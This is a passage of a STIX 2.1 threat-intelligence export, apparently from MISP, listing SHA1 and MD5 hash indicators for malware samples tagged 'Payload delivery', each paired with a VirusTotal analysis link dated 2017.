|
|
"url--58db8012-b25c-42d1-9f08-456702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8012-b25c-42d1-9f08-456702de0b81",
|
|
"value": "https://www.virustotal.com/file/3bb134617af6f7b0f0c483b315f7ea45b2ed2c4a91005b453c9ec9e86ef0d70b/analysis/1481868467/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8013-9c80-4621-bfc3-48f102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:19.000Z",
|
|
"modified": "2017-03-29T09:36:19.000Z",
|
|
"description": "sample - Xchecked via VT: 0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685",
|
|
"pattern": "[file:hashes.SHA1 = '07d7490c6a82261c787dfa04bdf0df97bf0318f2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8014-be98-49e4-9b3a-4da102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:20.000Z",
|
|
"modified": "2017-03-29T09:36:20.000Z",
|
|
"description": "sample - Xchecked via VT: 0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685",
|
|
"pattern": "[file:hashes.MD5 = '1d2fcc0d5c31454a574f0c7f91b019f6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8015-54c8-484f-8e44-4e3c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:21.000Z",
|
|
"modified": "2017-03-29T09:36:21.000Z",
|
|
"first_observed": "2017-03-29T09:36:21Z",
|
|
"last_observed": "2017-03-29T09:36:21Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8015-54c8-484f-8e44-4e3c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8015-54c8-484f-8e44-4e3c02de0b81",
|
|
"value": "https://www.virustotal.com/file/0321f7948476480ab1875ccdeac46c37a58c2f60d63d2a787bdcf292ff2a5685/analysis/1479475188/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8015-33b4-48df-8a12-424b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:21.000Z",
|
|
"modified": "2017-03-29T09:36:21.000Z",
|
|
"description": "sample - Xchecked via VT: 1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e",
|
|
"pattern": "[file:hashes.SHA1 = '2ccde400330fc3f2bb3b407bda698d91801785e3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8016-48d8-4095-9601-404002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:22.000Z",
|
|
"modified": "2017-03-29T09:36:22.000Z",
|
|
"description": "sample - Xchecked via VT: 1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e",
|
|
"pattern": "[file:hashes.MD5 = 'd626d76d2bfeedbd56ec27eab320b133']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8017-6fd4-4c54-9eae-481402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:23.000Z",
|
|
"modified": "2017-03-29T09:36:23.000Z",
|
|
"first_observed": "2017-03-29T09:36:23Z",
|
|
"last_observed": "2017-03-29T09:36:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8017-6fd4-4c54-9eae-481402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8017-6fd4-4c54-9eae-481402de0b81",
|
|
"value": "https://www.virustotal.com/file/1f376d4c4febcafa6bdcf8877121c20697046c15f71983a9210762fbf3b5455e/analysis/1489573799/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8018-4e10-4af4-8eb1-41a802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:24.000Z",
|
|
"modified": "2017-03-29T09:36:24.000Z",
|
|
"description": "sample - Xchecked via VT: 4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0",
|
|
"pattern": "[file:hashes.SHA1 = '356d5e07ca3157d6523c9878bc20b99935f6a897']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8019-ab5c-4715-ae1a-406b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:25.000Z",
|
|
"modified": "2017-03-29T09:36:25.000Z",
|
|
"description": "sample - Xchecked via VT: 4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0",
|
|
"pattern": "[file:hashes.MD5 = 'adc75bc411a3b5e7d806606f09925f86']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db801a-293c-4427-8a65-422602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:26.000Z",
|
|
"modified": "2017-03-29T09:36:26.000Z",
|
|
"first_observed": "2017-03-29T09:36:26Z",
|
|
"last_observed": "2017-03-29T09:36:26Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db801a-293c-4427-8a65-422602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db801a-293c-4427-8a65-422602de0b81",
|
|
"value": "https://www.virustotal.com/file/4b373c2d50e600fdae5259bbd3e989d002a776c443869b92afeb5d53b73bd1c0/analysis/1489573770/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db801b-3a64-48cf-9087-43af02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:27.000Z",
|
|
"modified": "2017-03-29T09:36:27.000Z",
|
|
"description": "sample - Xchecked via VT: 998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b",
|
|
"pattern": "[file:hashes.SHA1 = 'ed7d72b7c77801458452762e329cfd042cc8966a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db801c-6148-473d-b93a-4e5e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:28.000Z",
|
|
"modified": "2017-03-29T09:36:28.000Z",
|
|
"description": "sample - Xchecked via VT: 998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b",
|
|
"pattern": "[file:hashes.MD5 = '2ef71db8f11850cf39f22661876030fa']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db801c-7680-4d40-be0d-461f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:28.000Z",
|
|
"modified": "2017-03-29T09:36:28.000Z",
|
|
"first_observed": "2017-03-29T09:36:28Z",
|
|
"last_observed": "2017-03-29T09:36:28Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db801c-7680-4d40-be0d-461f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db801c-7680-4d40-be0d-461f02de0b81",
|
|
"value": "https://www.virustotal.com/file/998481fbb26e890b83e1738ee12281103ca77775a20c1c6f1705eb6552237e3b/analysis/1480493255/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db801d-0668-4e33-a8f8-491502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:29.000Z",
|
|
"modified": "2017-03-29T09:36:29.000Z",
|
|
"description": "sample - Xchecked via VT: 46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b",
|
|
"pattern": "[file:hashes.SHA1 = '64cdcc5107938e2b7701a23ac729820f2be6958c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db801e-9d60-4f92-abdb-4fb602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:30.000Z",
|
|
"modified": "2017-03-29T09:36:30.000Z",
|
|
"description": "sample - Xchecked via VT: 46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b",
|
|
"pattern": "[file:hashes.MD5 = 'dabbd07f7b205b2d13b3f0f1171fcff4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db801f-9d3c-48b5-8418-4cfc02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:31.000Z",
|
|
"modified": "2017-03-29T09:36:31.000Z",
|
|
"first_observed": "2017-03-29T09:36:31Z",
|
|
"last_observed": "2017-03-29T09:36:31Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db801f-9d3c-48b5-8418-4cfc02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db801f-9d3c-48b5-8418-4cfc02de0b81",
|
|
"value": "https://www.virustotal.com/file/46089e4e9aebf5fd5ad1ffaecb3bee5d7490f2cc53b5ed66b7509282ca29438b/analysis/1418901507/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8020-4dd0-44c6-9e5b-468102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:32.000Z",
|
|
"modified": "2017-03-29T09:36:32.000Z",
|
|
"description": "sample - Xchecked via VT: 6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e",
|
|
"pattern": "[file:hashes.SHA1 = 'cdfaa3ef35d6cfb74020529e1d63e74fd0733bdf']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:32Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8021-9f10-458b-b4f6-4f6002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:33.000Z",
|
|
"modified": "2017-03-29T09:36:33.000Z",
|
|
"description": "sample - Xchecked via VT: 6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e",
|
|
"pattern": "[file:hashes.MD5 = '68785cef5da39683497e5fa2ee9017f8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8022-3b9c-4aad-8a49-48b002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:34.000Z",
|
|
"modified": "2017-03-29T09:36:34.000Z",
|
|
"first_observed": "2017-03-29T09:36:34Z",
|
|
"last_observed": "2017-03-29T09:36:34Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8022-3b9c-4aad-8a49-48b002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8022-3b9c-4aad-8a49-48b002de0b81",
|
|
"value": "https://www.virustotal.com/file/6d99f010c237fec5ff022cdf2f0df8b26429c1d5f223ca4f1658fc833c9cef3e/analysis/1445904352/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8023-7fb8-4b4b-b016-4bd202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:35.000Z",
|
|
"modified": "2017-03-29T09:36:35.000Z",
|
|
"description": "sample - Xchecked via VT: 9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437",
|
|
"pattern": "[file:hashes.SHA1 = '28d9b549edca0ef75ea817c2567c8855b26f9c54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8023-d16c-478b-b082-4bb802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:35.000Z",
|
|
"modified": "2017-03-29T09:36:35.000Z",
|
|
"description": "sample - Xchecked via VT: 9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437",
|
|
"pattern": "[file:hashes.MD5 = 'f1dec64edea7119e671be3990d0d79ed']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:35Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8024-77a4-4297-953e-499f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:36.000Z",
|
|
"modified": "2017-03-29T09:36:36.000Z",
|
|
"first_observed": "2017-03-29T09:36:36Z",
|
|
"last_observed": "2017-03-29T09:36:36Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8024-77a4-4297-953e-499f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8024-77a4-4297-953e-499f02de0b81",
|
|
"value": "https://www.virustotal.com/file/9dde31f29d5180b26eb93dfe2fc07bae76f929b8d3add20fc577033ae234b437/analysis/1428768218/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8025-ae7c-40c7-9577-453102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:37.000Z",
|
|
"modified": "2017-03-29T09:36:37.000Z",
|
|
"description": "sample - Xchecked via VT: 0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a",
|
|
"pattern": "[file:hashes.SHA1 = 'b41e436009f8c0a4dde1e2e6202a3fe08462816c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8026-e410-4d56-abce-4f9d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:38.000Z",
|
|
"modified": "2017-03-29T09:36:38.000Z",
|
|
"description": "sample - Xchecked via VT: 0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a",
|
|
"pattern": "[file:hashes.MD5 = 'a162cb5198b48d386f10da002840af50']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:38Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8027-91e4-4f4d-91ee-43a102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:39.000Z",
|
|
"modified": "2017-03-29T09:36:39.000Z",
|
|
"first_observed": "2017-03-29T09:36:39Z",
|
|
"last_observed": "2017-03-29T09:36:39Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8027-91e4-4f4d-91ee-43a102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8027-91e4-4f4d-91ee-43a102de0b81",
|
|
"value": "https://www.virustotal.com/file/0909f8383cd77107234b5c1aa1c80a1f1bc2e8a2832284ff3de6636d5ed16b8a/analysis/1429091590/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8028-0f28-451d-bf0b-486902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:40.000Z",
|
|
"modified": "2017-03-29T09:36:40.000Z",
|
|
"description": "sample - Xchecked via VT: 6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9",
|
|
"pattern": "[file:hashes.SHA1 = '85b58ef59eefc6a729ad174e0b54f9fd14b0a572']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8029-e088-4dce-82ba-4ae002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:41.000Z",
|
|
"modified": "2017-03-29T09:36:41.000Z",
|
|
"description": "sample - Xchecked via VT: 6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9",
|
|
"pattern": "[file:hashes.MD5 = '10aaf1c71ef0704065d543632a4dd169']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:41Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db802a-da18-4354-b40f-46af02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:42.000Z",
|
|
"modified": "2017-03-29T09:36:42.000Z",
|
|
"first_observed": "2017-03-29T09:36:42Z",
|
|
"last_observed": "2017-03-29T09:36:42Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db802a-da18-4354-b40f-46af02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db802a-da18-4354-b40f-46af02de0b81",
|
|
"value": "https://www.virustotal.com/file/6bd3c86cb1f04d08407fccda35b0dd2fc8bd83a3c10f913dded93b4bbba182c9/analysis/1428941965/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db802b-a018-4927-9250-442f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:43.000Z",
|
|
"modified": "2017-03-29T09:36:43.000Z",
|
|
"description": "sample - Xchecked via VT: 0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4",
|
|
"pattern": "[file:hashes.SHA1 = 'dd3fdc5b0fe48a02a54c2166e24707796cb3c06c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:43Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db802c-04d4-48ec-a238-4c0d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:44.000Z",
|
|
"modified": "2017-03-29T09:36:44.000Z",
|
|
"description": "sample - Xchecked via VT: 0a31bfdc22ff3cea5a160b2c32a98764027be7512ced50825d1be0b93a7e7aa4",
|
|
"pattern": "[file:hashes.MD5 = 'efa187c9f6b7568af9c3e544ad9b94b1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:36:44Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db802d-ddf8-4acf-b71e-4f8002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:36:45.000Z",
|
|
"modified": "2017-03-29T09:36:45.000Z",
|
|
"first_observed": "2017-03-29T09:36:45Z",
|
|
"last_observed": "2017-03-29T09:36:45Z",
|
|
